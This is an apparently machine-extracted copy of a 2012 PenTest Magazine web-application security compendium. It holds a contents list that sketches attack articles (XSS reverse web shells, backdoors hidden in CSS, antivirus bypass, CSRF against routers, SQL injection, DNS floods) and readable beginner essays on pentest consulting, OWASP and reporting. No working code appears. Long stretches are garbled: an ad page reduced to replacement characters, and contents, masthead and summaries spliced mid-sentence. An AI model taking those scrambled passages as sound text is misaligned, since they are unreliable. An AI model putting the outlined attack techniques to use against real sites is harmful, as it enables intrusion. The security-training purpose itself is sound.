Global I.T. Security Training & Consulting IS YOUR NETWORK SECURE? www.mile2.com ������������������������������������������������������������ ���������������������������������������������������������������� ����������������������������������������������������������� ������������������������������������������������������ �� mile2 Boot Camps A Network breach... Could cost your Job! Available Training Formats � ������� �������� ������ ������ � � � � � ������������������������� ����������������� ������������������������������������������� ���������������������������������� ���������������������������������������������� �� ���� ��� ���� ��� ���� ��������� ��� ���� ������������������������ �������������� �������������������� ������������������ ���������������������������� � � ����������������������������������������� Other New Courses!! ���� ��������������������� �������� � ������������������������������������� �������� ������������������� ��������� � ��������������������������������������� ����������� ���� � � ���������������������� ���������� ��������������������������� �������� � ������������������������������� ��������� ��������������������������� ���������� �������������������������� � � �������������������������� ������� ����������������������������������� ��������� �������������������������������������������������� ��������������� ������� � ������������������������������������������������ ��������� ������������������������������ ���������������������������������������� INFORMATION ASSURANCE SERVICES ����������������� ������������� � (ISC)2 & CISSP are service marks of the IISSCC. Inc. Security+ is a trade mark of CompTIA. ITIL is a trade mark of OGC.GSLC & GCIH are trademarks of GIAC. � � ����������������� �������� � ����������������������������������� ���������������������������������������� ��� ������������������� ��� ������������������������� ��� ������������������������������������� ��� �������������� �������������������������������������������� 11928 Sheldon Rd Tampa, FL 33626 �������������� ��������������� ������������������� KNOW YOUR ENEMY ������������������������������ ������������������������������������������������������� ��������������������������������������������������� ����������������������������������������������� ��������������������������������������������� ��������������������������������������������������� ����������������������������������������������� ����������������������������������������������������� �������������������������������������������������� ������������������������������������������������� ������������������������������������������������������ ��������������������������������������������������� �������������������������������������������� �������������������������������������������������� ���������������������������������������������������� ������������������������������������������������������ ���������������������������������������������������������� ���������������������������������������������������������� ���������������������������������������������������� ���������������������������������������������������� ����������������������������������������������������� ������������������������������������������������������ ���������������������������������������������������������� ��������������������������������������������������������� ����������������������������������������������������� ���������������������������������������������������������� ������������������������������������������������������ ��������������������������������������������������������� ��������������������������������������������� ������������������������������������������������������ ������������������������������������������������ ����������������� ���������������� ������������ �������������������� ������������������ ����������������� ����������������� ������������ DE FACTO STANDARD ������������������������������������������������������� ��������������������������������������������� ���������������������������������������������������� ��������������������������������������������������� ������������������������������������������������� ���������������������������������������������� �������������������������������������������������� ��������������������������������������������������� ��������������������������������������������������� ������������������������ ���������������������������� �������������������������� ������������������� ������������������������� ��������������������� ���������������������� ����������������������������� ������������������������� ��������������������������� ��������������������� ������������������������� ����������������������������� �������������������������������������������������������� �������������������������������������������������� ���������������������������������������������������������� BENEFITS ����������������������������������������������������� �������������������������������������������������������� ����������������������������������������������������� ������������������������������������������� ����������������������������������������� ����������������������������������������������� ����������������������������������������� �������������������������� ������������������������������������������� ����������������������������������������� ��������������������������������������� ������������������������������������������������� ������������������������������������������ ��������������������������������������� ���������������������������������������� ������������������������������������������������������������� ���������������������������������������������������� ������������ ������������ �������������� ������������� ������������������������������������������������������������������������������������������������������������������������� and what he recommends for newbies you will know reading this brilliant article. Jeff Weaver.com . We proudly present Pentest Web App Compendium. you’ll know it. Pentest Regular and Pentest Auditing & Standards which also enjoy your interest and seek to be of the best quality and usefulness for you. completely different uses other than their intended purpose”. we have decided to put them together and prepare for you something special. this will add up to considerable business value you can’t afford to overlook”. partners. overall. Enjoy reading! Wojciech Chrapka. Herman Stevens shows us plain hacker reality and all steps that the newbie has to take to become a hacker. running your tests. attack. the unique. We wouldn’t be here without your support and help. A year full of great articles especially devoted to web applications. 01/2012(1) Page 4 http://pentestmag. Ed Werzyn. We would like to say thank you to all our readers. Now you can have them in one issue that you can obtain individually. Robert Keeler. At the beginning PenTest had been released once per month and it was dedicated to the wide range of topics – including the realities of the market. as he mention: „Let’s face it: hackers like to take things apart to see how they work and find it challenging to find other. We believe it will encourage you to stay with PenTest for longer. Malgorzata Skora & PenTest Team Hello Everyone! BASIC 10 Web Application Security for Newbies part 1 By Herman Stevens Herman introduces us to the world of hacking and web application security. Rishi Narang.EDITOR’S NOTE It has been over a year since PenTest was released. XSS & CSRF. authors. We greatly appreciate all suggestions and pieces of advice given to us in good faith. reporting your results – everything from start to finish. betatesters and proofreaders. As he claims „When you choose and use good tools. Therefore. 22 Web Application Security for Newbies part 3 OVERALL 26 Open Source Web Application Security Testing Tools By Vinodh Velusamy Author shows us the significance of Open Source Web Application Security Testing Tools. Amazingly. So here it comes to summarize our fruitful cooperation: Pentest Web App Compendium: the only. He shows us his own biography as a hacker and professional. It was firstly released in November and now it is the most popular and appreciated issue. the best! 29 articles devoted to web applications carefully selected from all our issues to create thematically diversified mixture of technically advanced pieces able to satisfy your expectations. with a good web vulnerability scanner you’ll be able to maximize the number of legitimate vulnerabilities discovered to help reduce the risks associated with your information systems. Scott Christie. We always consider them and try to take advantage of your experience. At the end of the day and over the long haul. basics and memory corruption. particularly emphasising: A. Massimo Buso. What are his first conclusions. But do not forget about Pentest Extra. Johan Snyman. because one does not need to use the provided client or even a browser to attack a website. since there is always something new to learn. interviews and social matters. Web Application was created as an answer to your needs. you’ll minimize your time and effort installing them. By Herman Stevens In the previous article you learned that all client-side security can be bypassed. Dennis Distler. Daniel Wood. 16 Web Application Security for Newbies part 2 By Herman Stevens Herman Stevens continues his journey through Web Application Security showing newbies his personal experience. So we like to think about this publication more like a good beginning rather than a big crowning. Once you have decided to go that path. We know that there is a lot more issues and problems to be discussed. Two hundred pages divided into several thematic categories: SQL injection. Rao. Now we are going to build further on that knowledge and delve deeper in the fantastic world of application security. Most importantly. Jonathan Ringler. But it is impossible to start all threads at the same time. life will never be boring again. Eugene Dokukin. fuzzing. Jeff Weaver. allows a user to take control over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user.kuca@software. SQL injection.pl Publisher: Software Press Sp. Today. This article will discuss the three most common and devastating software security vulnerabilities. Kyle Kennedy. TEAM 50 Web Application Security Vulnerabilities Have Been Prevalent The Last Decade By Matt Parsons Betatesters: A.pentestmag. z o. clients are not only the people working on their computers on the desk. Rao. All trade marks presented in the magazine were used only for informative purposes. they no longer represent a software application with bare bones support for just HTML. SK 02-682 Warszawa. Dennis Distler. Sites like LinkedIn. concerning the results of content usage.pogroszewski@software. Cross Site Scripting and Cross Site Request Forgery. Johan Snyman Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Dudzic ewa. Simple search (space. Jonathan Ringler.dudzic@software. ATTACK 62 Session Hijacking By Nikhil Srivastava Session hijacking. All rights to trade marks presented in the magazine are reserved by the companies which own them. local networks. Garg Editor: Wojciech Chrapka wojciech.com Whilst every effort has been made to ensure the high quality of the magazine. 44 Ready Your Firefox for Pentesting By Dhananjay D. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.com. 72 Finding Your Target By Willem Mouton Dumpster diving.com.com. To create graphs and diagrams we used program by Port 80 and Port 443 has been a great attack vector for malicious attackers.com. Ankit Prateek.) is not as effective as wildcard DISCLAIMER! The techniques described in our articles may only be used in private. Aidan Carty.com. only one character. projects that the organization is involved with and perhaps even information about third party products and suppliers that are in use. but in recent times social media can provide us with even more.o. express or implied. Facebook and Twitter can provide you with lists of
[email protected]. Here you must be aware of the term clients. Ed Werzyn.com . Once the user’s session ID has been accessed (through session prediction).pl Malgorzata Skóra malgorzata. ul.pl DTP: Ireneusz Pogroszewski Production Director: Andrzej Kuca andrzej. the editors make no warranty. and it can also be some machines. Daniel Wood. Scott Christie. the attacker can masquerade as that user and do anything the user is authorized to do on the network. web browsers like Mozilla Firefox come with the support of add-ons. which are small installable enhancements to a browser’s foundation. 01/2012(1) Page 5 http://pentestmag. etc. But this still does not mean that they are not exposed to Denial of Service attacks. if you are up for it and have physical access to the target. Bokserska 1 Phone: 1 917 338 3631 www.pl Art Director: Ireneusz Pogroszewski ireneusz. also known as TCP session hijacking.pl Although even today web browsers serve the primary purpose of bringing information resources to the user. means sifting through trash to get useful information. 76 Search Form Based DoS By Bunyamin Demir Mathematical formulas created by Design Science MathType™ Many of today’s applications have prevention against attack vectors like wildcards queries. Massimo Buso.CONTENTS 36 Web services and testing By Saurabh Malhotra A web service is just a system which resides somewhere on a network and gives response specific requests from clients.pl Marketing Director: Ewa Dudzic ewa. Robert
[email protected]@software. Shell of the Future is a Reverse Web Shell handler.It has been designed to be used as a proof of concept to demonstrate the impact of XSS vulnerability in a penetration test with the same ease as getting an alert box to pop-up. money. We will focus on a practical way to exploit postauthentication XSS’s and CSRF. So it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead. XSS & CSRF 94 XSS Using Shell of the future By Sow Ching Shiong 82 How to pentest well-known CMS By Sumedt Jitpukdebodin Today. After examining the web antiviruses: Web Virus Detection System. McAfee SiteAdvisor. These entire websites are created with the same CMS. We will not explain the basics of web application attacks in this article. It is estimated that 20% of total Internet traffic amount is DNS traffic. Most new websites have the same look. But even the simple search queries. It can also enlist TCP on the same port for zone transfer of full name record databases. On Linux the user used to help the attacker is www-data. DNS is a very attractive to attack as very often IT administrators forget to implement measures to secure DNS service. a denial of service attack is very difficult to trace and block as they are highly spoofable. A DNS flood works by sending large number of rapid DNS requests. which remain a highly underestimated attack vector in the security scene.attacks. As UDP is a connectionless protocol. It can be used to hijack sessions where JavaScript can be injected using XSS or through the browser’s address bar. 88 How to attack DNS By Aleksandar Bratic 78 Backdoors Hiding Malicious Payloads Inside Cascading Style Sheets By Hans-Michael Varbaek When a website gets compromised a new file is often created by the attacker. a new website is created about every minute. The payload would create a privileged account and email the password to the attacker. which is by default used for serving Apache threads. page structure. This would allow a targetted attack against the web site by sending the equivalent of phishing emails. Yahoo. only difference is the logo of the website. increase the application server’s response time if you find a good way to the increase the amount of database results. the Advanced Search feature of the applications will create complex (containing more than one keyword like bank account. he will describe such methods of bypassing web antiviruses and outline what developers of these systems need to take into consideration in order to prevent the possibilities of hidden malware passing through them. 104 XSS & CSRF: Practical exploitation of post-authentication vulnerabilities in web applications By Marsel Nizamutdinov The goal of this article is to demonstrate the real danger of post-authenticated vulnerabilities. credit) queries and as a result of these complex queries the number of results will be greatly increased. 01/2012(1) Page 6 http://pentestmag. etc. and StopBadware. It makes use of HTML5’s Cross Origin Requests and can bypass anti-session hijacking measures like Http-Only cookies and IP address-Session ID binding. In this article. he concluded that every web antivirus is vulnerable to malware’s attempts to hide from it. where he or she can sometimes do almost the same on the system as any other user. 98 Cross-Site Request Forgery By Jamie 86 Bypassing web antiviruses By Eugene Dokukin aka MustLive During a test. I found a create user function which was vulnerable to CSRF. customization of the theme. Google. The CMS (Content Management System) is a web application system that has many tools for helping the web master to author content. Norton Safe Web. This allows malware to go undetected and continue to infect visitors of these infected websites. as that has already been done many times before by others.com . so could easily happen without the administrator’s knowledge. flooding the server with an amount of traffic that it can’t handle so that the performance of the server drops for legitimate requests. they would simply have to click on a link while logged in. DNS listens on port 53 where UDP is used to resolves domain names to IP addresses and vice versa. Anybody can be an owner of a website today very easily. except instead of trying to get the user to enter their credentials. With this in mind. different colors. administration website. Yandex. user management. Network devices which have an option to allow remote access and have CSRF vulnerabilities can be attacked in such way. In particular. First one allows the user of the site to manipulate the site’s functionality to increase his finances. issues stem from how it handles same origins and authority. Some of the issues can not be fixed in browsers as the real problem is how web applications handle actions. tables and user accounts of the back-end database. 132 By Sow Ching Shiong SQL Injection Pen-Testing SQL Injection is an attack in which the attacker manipulates input parameters which directly affect ��������������������� ������������������ �������������� ������������������������� ������������������������ 01/2012(1) ����������������������� ������������������������ . The issue revolves around general browser architecture and its handling of the web origin policy. 124 By Eugene Dokukin CSRF Attacks on Network Devices The first attack it’s to turn on the remote access to the admin panel (it’s off by default). second one allows an external attacker to manipulate the site’s functionality to increase his finances. a penetration tester will be able to exploit a vulnerability to view the list of records. These vulnerabilities are easy to locate and perform attacks against whilst allowing an attacker to completely compromise an account and/or compromise the host. to allow remote attacker to access the admin panel from the Internet and change all required settings (and this attack can be conducted in one request). 120 CSRF Business Logic Vulnerabilities via By Eugene Dokukin There are two types of Business Logic flaws: serverside and client-side. It gives the ability to quickly and easily exploit or demonstrate SQL injection vulnerabilities in Web applications. ����������������������������������� ������������������������������������������� ����������������������������������������� ������������������������������������������ ����������������������������������� ������������������������������������������ ����������������������������������������� ���������������������������������������� ������������������������������������������ ������������������������������������� ���������������������������������������� ����������������������������������������� ������������������������������������������ ������������������������������������������ SQL INJECTION ����������� ������������������������ ����������������������������������� 128 By Sow Ching Shiong NTO SQL Invader NTO SQL Invader is a SQL injection exploitation tool. With a few simple clicks. by decreasing finances of the user of the site.112 Failures Discovering Modern CSRF Patch By Tyler Borland Cross-site request forgery (CSRF/XSRF) vulnerabilities allow an attacker to perform authenticated actions without authenticating as the user. And I have found both types of such vulnerabilities many times since 2005. the author will show you how to perform SQL injection pen-testing using open source and free tools available for Windows and Linux. Determining exploitability is hard. Backend databases contain lots of juicy information that an attacker may be interested in. 158 By Sagar Chandrashekar Fuzzing With WebScarab This year a tool called Pmcma (Post Memory Corruption Memory Analysis) was released at the Blackhat US security conference.an SQL statement. and is 01/2012(1) Page 8 http://pentestmag. WebScarab and WebGoat can be installed on both Linux and Windows machines. books and papers describing the benefits and drawbacks. They store the data that is delivered to website visitors (including customers. you will need a fuzzer and fuzzing target. employees. In this article. common sense… In this article the author made a serious efforts to provide you all the details concerning Pmcma tool. WebScarab is a framework maintained by OWASP. Depending on permissions. The following article is an introduction to Pmcma. The second part of the article describes pmcma.com . Proving unexploitability is provably unfeasible in the general case. Although typically used for bug discovery in a lab environment. released at the Black Hat US conference this year. that you might need. This usually occurs when no input sanitisation is conducted. Public knowledge. In order to follow along with the fuzzing exercises in this article.c implementation. detecting unaligned memory accesses and finally automating analysis and exploitation scenarios. WebScarab will be our fuzzer and WebGoat web application is our target. MEMORY CORRUPTION 172 Introduction to exploit automation with Pmcma. focusing on attacking function pointers. It helps security engineers. Part II By Jonathan Brossard Can you write a simple python script? Can you understand a network protocol and describe it using a simple object set? If so. writing exploits is hard. As a QA resource. As it is mentioned above. an attacker may be able to read database contents or even write to the database. In this article the author gives us the good insight into the theory of the art of fuzzing. Here the author makes a great introduction into the art of SQL Injection. Part I By Jonathan Brossard FUZZING 150 By Mrityunjay Gautam Fuzzing for Free As a developer working on a product release. the author presents you how to use the Sulley Tool. there are opportunities to use fuzzing in a penetration testing role too. you can find your own 0-day vulnerabilities! In this article we are going to describe how we can use Sulley Fuzzing Framework with a real vulnerable FTP Server. and practically for the vast majority of computer programs actually used nowadays. thus portable to many platforms. we tend to re-use most of the legacy code from the previous release and then work on the new features and bug-fixes only. The author made a serious efforts to provide you all the details concerning this tool. It is written in Java. that fuzzing can be used in a wide range of ways. developers to identify vulnerabilities and bugs in web applications. Here. 164 By Joshua Wright Fuzzing in a Penetration Test 142 SQL Injection: Inject Your Way to Success By Christopher Payne Databases are the backbone of most commercial websites on the internet today. we would be using the same “conformance test suite” or the same “stress test suite” to ensure that the new builds are working as expected. Protocol fuzzing has been a popular technique for bug discovery with a number of tools. So what you can get at best is a it’s not doable given the state of the art of exploitation. simulating arbitrary reads. and business partners). due to theoretical limitations hopefully known to the reader of this paper (aka: halting point problem). In fact. you will certainly get convinced by Josh. they are two sides of the same coin. The author focuses on describing how does the WebScarab Tool work like. suppliers. 154 By Jose Selvi Fuzzing With Sulley 184 Introduction to exploit automation with Pmcma. . Fast forward a few years. My humble Amiga e500 was the first nonacademic and non-corporate system on the Internet in Belgium. Schools and universities were very quick to forbid their use because they wanted students to learn how do the math other than just punch a few buttons on a calculator to get an answer. which 01/2012 cascaded into a whole bunch of other programming languages on the Amiga (ARexx. Modula2. Let’s face it: hackers like to take things apart to see how they work and find it challenging to find other. and the wars between the ZX Spectrum and Commodore 64 computers. to create a completely useless program that would calculate PI to an infinite numbers of digits. I am afraid that most young people nowadays do not really understand how long all their Internet comments will be available for everyone to see. where people from all over the world connected to my Amiga 500 BBS (Bulletin Board System) to exchange email.BASIC Web Application Security for Newbies – Part 1 Born this way “How did you become a hacker?” is the number one question people ask me when they learn what I do for a living. such as Fido or commercial offerings like CompuServe. Lattice C). The personal computer had not been invented yet (yes. like all forbidden fruits. but Hewlett Packard and Texas Instruments introduced some fantastic programmable calculators. So. I finally made my hobby into my profession (first as developer. Forth. They like to break http://pentestmag. and later the Atari ST and the Amiga began. This tinkering activity was soon followed by my first introduction into programming. on the rubbery keyboard of the ZX Spectrum. I have very fond memories of wasting whole evenings by typing in hundreds of op-codes into a TI-58. That started my rudimentary programming skills in Basic. I am that old). My first act – at least one that can still be traced in Google groups – on the Internet.com Page 10 . A few years later. then as security consultant) and the rest is history. I believe that people are not made into hackers. Pascal. Of course. I started my hacking life more than 40 years ago. In the process I re-utilized our clothesline and made it into a large radio antenna to my mother’s dismay. I became a node in the worldwide Fidonet. by taking apart tube radios. This question does not have a short. The Internet was still only available in the deeper dungeons of the academic world. was to start a flame war between Module2 and C language fans. or easy answer. was the birth of the commercial Internet. I switched to a PC and ran the BBS on Linux (the infamous Slackware distribution that took about 20 floppies to load – usually one experienced a read error on the 20th disk). this only made them even more popular. After the demise of Commodore. but people started to use modems to connect their computers to amateur networks. news and files. completely different uses other than their intended purpose. but they are born that way. modifying them to listen to distant stations on the short wave bands. no further definitions are given. skills. You have stumbled to the right place and read the right magazine. A standard. or what is a vulnerability assessment and there is even more confusion on what constitutes a proper assessment or pen-test. because this is exactly what this series is about: How to hack a web application (when talking to your friends). open them up. anything goes and you will succeed. you need to have better advice to give to the customer other than. but if a fix would cost a million dollar and six months of additional testing. your report should respond to what the customer wanted you to execute. but not provide any advice on how to fix it. what your customer asks you to do. a vulnerability assessment : the goal is to list as many vulnerabilities as possible. medium or low risk. Talk to your customer. Don’t worry. or need for you to do. try not to hit them with a bunch of marketing material. This series starts from the assumption that you have the right mind set and are determined to learn as much about application security as there is to learn. 01/2012 There is no generally accepted definition about what is a pen-test. Although. With that attitude. (Note: The above definitions are mine.com Page 11 . not only give a good introduction on the technical side. the problem is. but you will be more valuable to them if you can tell them how to prevent it next time. you should always keep in mind what the customer really wants. but might still not know that much about web applications. but will also work on the people. and even less about how to hack them. If you focus only on the technical part. or how you hacked your way into their network. If you need some arguments about what is the best type of assessment. you soon learn that your customers do not pay you for what you know about a specific subject. Your Customer Does not Really Know What They Want Knowledge is King When you start working as a consultant. might not be what they really wants you to do. since they love new technologies and are very good in thinking out of the box. you will be able to tell the customer about the vulnerabilities in their application. Unfortunately. Fix this now! I have seen too many technical pen-test reports in the past. requires pen-testing (at network and application level) and vulnerability assessments. hammering hard on what was technically wrong with an application. Your report and information are the only things that are important: that is what the customer is paying for. Let me explain that further. or what went wrong at the management level. in this big application security space. what they really want is a vulnerability assessment. if this is considered a high. this will not become a boring theoretical series – there will be plenty of technical information as well.) Many of my customers will ask for a pen-test. the tools. but what you know about what works and what doesn’t work. It is fine to know the technical faults. and give them the best choice based on their security objectives. This series will. and the knowledge that is needed to become a top consultant. Leaving out source code review. there are two main types of possible assessments: • • a pen-test : the goal is to exploit a vulnerability (or multiple vulnerabilities) and gain access to an application or data (the target). apart from technical items. put them back together and learn as much as possible in the process. such as the Payment Card Industry (PCI) standard. and provide an educated estimate of the vulnerability level. This series will provide you with knowledge on application security assessments. reporting and presentation skills. the real value is on how you translate that knowledge into something your customers will value. If you believe that you have the right attitude and these qualities. Unfortunately. Your customer wants to know: • • • • • What is the business risk? Is there a quick-fix available? Are there any mitigating measures? What can I do to prevent this from happening again? How much will it cost and what is the timing? Working as a professional.things. you might have the hackers’ mentality. I also assume that you already have some basic networking and server knowledge and that you know some scripting and are not afraid to install applications and test tools. background. Of course. but if you ask them about it. (as a pentester or hacker) your technical skills are important. or hacker. but give them independent and unbiased advice (customers have a long memory and will appreciate that) and refer your customer to this publication: http://pentestmag. or How to assess the security of critical web application (when talking to your customers). • static analysis found the most implementation bugs. The lowest level is the tool-based level. I will offer plenty of interesting material on how to improve your skills. This series will focus on an vulnerability assessments at the application level. you definitely do not want to loose a project because of one of your competitors offered the easy solution. • Your Competitors will Muddy the Waters You have talked to your customer about their needs. An automated scan. so that people and organizations can make informed decisions about true application security risks. • if one has limited time. because they have a different methodology: • • A fully automated scan. with a consultant deleting the false positives. but even as a dedicated pentester. OWASP gained a lot of credibility when the Payment Card Industry (PCI) Data Security Standard (DSS) required that all applications in scope: http://pentestmag. but remains a very solid basis for anyone starting in application security. or read their detailed Request for Proposal and wrote a brilliant quote that answered all of their requirements. Impossible! You have the best experience. with nothing more than the automated report. What to do? Make it very clear to your customer about what your propose and what the advantages are: • Use the descriptions and tests as defined in the OWASP ASVS (Application Security Verification Standard standard – https://www. Surely. explaining step-by-step what needs to be tested in a typical web application vulnerability assessment. there are many ways to execute a vulnerability assessment and your competitors were able to offer a lower price. Its mission is to make application security visible. they really do not have a choice. you must first find a vulnerability. What went wrong? Unfortunately. you think. 01/2012 What is This Thing called OWASP and Why Should I Care? OWASP (the Open Web Application Security Project) is a not-for-profit. takes less than day and my little sister can execute it. You might want to start reading this guide. • systematic manual penetration testing found the most design flaws.pdf – note that their penetration test is in reality a vulnerability assessment) comes to the following conclusions: • no single technique discovered every type of vulnerability. Use a standard methodology based on the OWASP Testing Guide: this is a very detailed guide. The guide (updated in 2008) is already a bit outdated. • the most effective technique (measured in vulnerabilities discovered per hour) was automated penetration testing).com Page 12 . the best consultants and the best methodology.com/papers/esem2011. OWASP publishes many tools and guides related to application security. since in the next part of the series we will use that as a background. Each level described in ASVS includes a set of requirements for verifying the effectiveness of security controls that protect Web applications.owasp. if the customer needs a specific kind of assessment because of compliance requirements. Guess what methodology is the cheapest and was offered by your competitors? Note that all methodologies might have there benefits and be the best offer for the customer in certain circumstances. Of course. Everyone is free to participate and all materials are available under a free and open software license. and a junior can do it. One Technique is Not Enough: A comparison of Vulnerability Discovery Techniques (available from http://andrew-austin. Some requirements just cannot be assessed by a tool. OWASP has local chapters with meetings all over the world. The ASVS defines four levels of application-level security verification for Web applications. will take many days and needs a senior consultant. the customer explained that your quote was twice the price of the cheapest one. worldwide charitable organization focused on improving the security of application software. • A largely manual assessment based on the deep knowledge of the consultant. Asking for a reason.BASIC • Based on a case study of two web-based electronic health care record systems the paper. only to find out that they awarded the project to one of your competitors. takes less than a day. one should conduct automated penetration testing to discover implementation bugs and systematic manual penetration testing to discover design flaws. you will win this project! A few weeks you anxiously call the customer for news. However.org). Example priority rating for detected issues Priority Rating Critical Issues leading to an attacker gaining administrative rights on the application or gaining access to other parts of the back-end infrastructure Issues enabling an authentication or authorization bypass a denial-of-service (DOS) attack or a compliance issue. Usually they are not. Do not use an overly complex classification. This is very often used by companies to give the impression that their measurements are very exact and are based on solid research. This is closely related to a risk rating (I prefer to give it the name of priority rating. If you have invented your own completely different methodology. do not lose too much time performing tests to proof that they are vulnerable. Refer to Table 1. you will lose an awful lot of time explaining the benefits of your approach to your potential customers. but could accept a downtime of multiple days if confidentiality was in danger. Issues with a high priority rating should be tackled first. and you definitely do not want to be involved in discussions like. Must protect against the OWASP top-10 of vulnerabilities or similar. • Can the current employer detect if the one of his staff members is posting a resume? • Can employers see what type of profiles the competitors are looking for. A technical section providing an overview of all issues. Federal Trade Commission strongly recommends that all companies use the OWASP Top Ten and ensure that their partners do the same.• • Must comply with the secure coding guidelines of OWASP. Anything else detected that should be in the report. So.S. or can we wait six months. It is always easier to link your methodology to an established standard such as OWASP. In this case. where candidates could leave their resume. An example: • A multinational company offered an on-line job database. test for confidentiality issues.1 rated issue? The report should also include: • A management summary detailing the business risks and recommendations and it should not contain any technical details and jargon. High Medium Low Informational 01/2012 Page 13 http://pentestmag. and employers could search for good candidates.com . why is it in this first article of this series? Quite simple: the report is the one thing that your customers is paying you for. or what candidates they are approaching? • Can confidential data be extracted by thirdparties who should not have access to it? A company responsible for air traffic control has extremely high availability demands. Do we need to implement the fix immediately. It is based on the expectations by the customer of the project and should not be taken lightly. If the customer does not care about a specific security related risk.S. but could not care if data was leaked to the outside world (the information is mainly public). The U.4. but should explain exactly what harm an adversary can do. This issue is rated 63. but is not a security issue. for an example. such as: Ask the question: What keeps you awake at night ? This is the number one item your tests should be investigating and focusing on. • The Report A report is written at the end of an assignment. • Table 1. as with this 60. Defense Information Systems Agency has listed the OWASP Top Ten as key best practices that should be used as part of the Department of Defense Information Technology Security Certification and Accreditation Process. They really wanted to have a high level of confidentiality. the U. classified according to the priority rating. generally deviations of best practices without immediate impact. Everything you will validate during the security tests will be done because it is needed in the final report. Con�dentiality related issues or issues that weaken the security posture of the application Issues with very low impact. Note that this table must be modified for each assignment. since the term risk rating might have a different meaning depending on the type of the company or the risk-appetite of that same company). In addition. sg). information security consultant. 01/2012 HERMAN STEVENS After a career of 15 years spanning many roles (developer. where he is the director of his company Astyran Pte Ltd (http://www.org) in order to have a common language to discuss each item. provide details on countermeasures. security. Page 14 http://pentestmag.astyran. Recommended process improvement to prevent the issue from happening again for audit.astyran. Be very clear in what you offer. Read all about it next time! u Conclusion This was the first in our series. development and IT management detailed overview of scope and goal description of scoring method overview of tests executed detailed overview of each discovered issue Technical Section Be critical.org).steve ns@gmail. a proof of concept and the remediation steps. described without any technical jargon recommended countermeasures: quick �xes.BASIC Table 2. For the management section. the Common Attack Pattern Enumeration and Classification (CAPEC – http:// capec. new application. Know the contents of a quality report. temporary �x. next time we start with a technical overview of the HTTP protocol and the HTML standard. Make certain that you can do more than just pushing a button to start a tool. I hoped you like this article. Understand the goals of your customer and give him some unbiased advice. some often used tools and the first vulnerabilities for our report. and – where necessary – provide references to OWASP material (http://www. • • Know a bit or two about the OWASP Testing Guide and the OWASP ASVS standard.com). Contact Herman by email (herman. complex change.com) or visit his blog (http://blog. A temporary and mitigating measure might be to monitor the application to see if any brute-force efforts are happening or not. but remember: this is not only the fix at the application level. this might take a long time to fix. Payment Card Industry auditor. Astyran specializes in application security. In Information Technology. For each discovered item.com . everything becomes a commodity. Advise your customer on business risks and countermeasures. Typical content of a report Web Application Vulnerability Report Management Summary high level description of the scope and goal overview of critical and high priority rated items. but be correct: People’s jobs may be at risk because what you write. application security consultant) Herman Stevens. but maybe mitigating issues. The above recommendations should enable you to produce better reports than a report from a tool. Do not become the next one. awareness training and security in the SDLC.mitre. and focus on things that are interesting (and thus worth money) for your customer. such as penetration tests. secure code reviews. Table 2.org/) and the Common Weakness Enumeration (CWE – http://cwe. Keep your text short and to the point. An example: If the application has a weakness in the authentication system that allows an attacker to perform a brute-forcing attack. security product trainer. vulnerability assessments.mitre. include the following information: the description.owasp. Include an estimate (high. medium. the possible impact. low) of the costs and a recommended timing. you should: • • • • Know the difference between a penetration test and a vulnerability assessment. After reading this article. provides an overview of items usually present in a management summary or a technical section of a vulnerability assessment report. now works and lives in Singapore. . http://pentestmag. but in the real world. I still consider every assignment as fun. You must be capable to suck in that knowledge like a sponge. While I believe I do live an exciting life (after all. nerds and wizards at the keyboard. IT auditors and security managers. living an exciting life.. Remember. soon your 01/2012 • • • colleagues will learn from you also and respect you as a team member. As a future hacker. so they understand the good and the bad things about the solution.com Page 16 . not all of the above hacker capabilities are being sought after and in reality the image of the lone hacker is as far from the truth as can be imagined. exciting and even exhilarating at times. but in the end. you: Will be working in teams: No single individual possesses all the knowledge required. It really opens your mind to see what vulnerabilities others can find. Learn when to suppress your nerdy nature: Of course you must hone your technical skills. my skills has brought me to all corners of this planet). Will respect you colleagues and learn from them: I learned the most about application security by doing peer reviews of their reports. they love to tinker and delve deep into the technical details. no five-day ethical hacking course will make a skilled consultant out of you. how they describe the risks involved and potential ways to exploit those vulnerabilities. M • ovies usually paint the same image of hackers: self-trained loners..BASIC Web Application Security for Newbies – Part 2 The naked hacker None of the movies about hacking depict the real truth about it. Most hackers I know really are self-trained. But. and if you are really good. non-technical terms to top management. Only experience will teach you when you can cut corners safely. you will have limited time for a project. you are working for a customer. that has a specific goal or objective in mind. they are good at one thing – they attract people with potential talent into the ‘hacking’ profession. They hired you as professional to verify whether or not their new baby is secure (and this really means secure enough in the eyes of a businessman) and can attain the security objectives in line with the expectations of management. Follow a strict methodology: You definitely do not want to present an ‘all clear’ picture to management. no respect for rules and authority. capable of thinking out-of-the-box. or are even capable of attaining all that knowledge. you must be able to explain them in clear. and asking a colleague is usually way faster then delving into obscure manuals. while a staff member who ran a simple public domain tool just found a critical vulnerability. but part of the job is very boring. You need to develop or – when you start your life as a hacker – follow a strict methodology in order not to miss something important. com Page 22 . such as: • Does the application accept file-uploads? • Is there an email (e. A new version of the guide is alas long overdue. Let’s take a look at how the information gathering phase can be executed. They might have the same business functionality. frameworks and technologies used vulnerable to known attacks? What is the attack surface of the application? There are different definitions available of the attack surface. the principles of secure programming.php/Category:OWASP_Testing_Project). You will want to have the answers to the following questions: • What technology is used by the web application and. You just have to apply those principles to the new technology. leave feedback) option? • What input forms are available? Who are the users of the site? Information can be important to abuse later to brute-force the authentication system. Contrary to network level security. Once you have decided to go that path. and. Last month you learned that all client-side security can be bypassed. since there is always something new to learn. The secret is that once you know the basics. because one does not need to use the provided client or even a browser to attack a website. good for us. never forget the server-side part! We also touched up the need for a strict methodology.BASIC Web Application Security for Newbies – Part 3 I know what you developed last summer In the previous article you learned that all client-side security can be bypassed. but the design and implementation always differ wildly. because one does not need to use the provided client or even a browser to attack a website. are the versions of these services. life will never be boring again. whenever new things arrive (for instance mobile apps) the same old mistakes will be made by the new batch of eager developers wanting to jump on the new bandwagon. 01/2012 Information Gathering A good start to build your own methodology is to read the OWASP Testing Guide (https://www. Now we are going to build further on that knowledge and delve deeper in the fantastic world of application security. Information gathering is important. Customers often want to know how we can possible keep up with the changing technology landscape or the thousands of different frameworks. but in general these all vectors that can be used for an attack. Once you have decided to go that path. • • The OWASP Testing Guide lists the following activities in the Information Gathering Phase: http://pentestmag.org/ index.g. This is also true when you need to review an Android or iPhone app. No two applications are the same. it becomes easy. which makes application security pentesting both fun and 